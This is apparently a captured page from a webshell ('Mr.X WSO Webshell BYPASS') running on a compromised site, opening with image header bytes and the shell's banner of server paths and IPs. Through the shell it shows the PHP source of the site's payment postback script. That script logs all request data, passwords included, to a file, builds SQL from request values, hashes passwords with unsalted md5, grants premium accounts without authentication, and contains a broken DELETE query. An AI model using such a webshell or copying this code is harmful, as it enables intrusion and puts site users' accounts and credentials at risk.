����JFIF���������
| Attention: Uname: Php: Hdd: Cwd: | Mr.X WSO Webshell! - Personal WEB SHELL Mr.X BYPASS! V2.5 Telegram: @jackleet 5.3.29 Safe mode: OFF Datetime: 2026-04-09 14:15:49 1999.30 GB Free: 71.23 GB (3%) /home/httpd/html/stoptube.com/ drwxr-xr-x [ root ] [ home ] Text | Server IP: 127.0.0.54 Client IP: 216.73.216.53 |
| [ Files ] | [ Logout ] |
|---|
<?
include('../admin/db.php');
if(!$epochPostbackEnabled) {
exit("Please enable Epoch postback in script configuration");
}
$log = print_r($_REQUEST,true);
file_put_contents($basepath.'/cache/epoch_log.txt',$log."\n\n\r\r",FILE_APPEND);
$_REQUEST = mysql_real_escape_array($_REQUEST);
$request = $_POST['command'];
switch($request)
{
case 'ADD':
$result = mysqli_query($dblink,"SELECT * FROM users WHERE username = '$_REQUEST[username]'");
if(mysqli_num_rows($result) > 0) {
if(mysqli_query($dblink,"UPDATE users SET premium = 1, password = md5('$_POST[password]'), salt = '' WHERE username = '$_REQUEST[username]'")) {
exit("ADDED $_REQUEST[username]");
}
else {
exit("ERROR");
}
}
else {
if(mysqli_query($dblink,"INSERT INTO users (username, password, premium) VALUES ('$_REQUEST[username]', md5('$_REQUEST[password]'),1)")) {
exit("ADDED $_REQUEST[username]");
}
else {
exit("ERROR");
}
}
break;
case 'DELETE':
if(mysqli_query($dblink,"DELETE FROM users username = '$_REQUEST[username]'")) {
exit("DELETED $_REQUEST[username]");
}
else {
exit("ERROR");
}
break;
case 'CHECK':
exit("NOT FOUND");
break;
default:
print "Command not recognized.";
break;
}
?>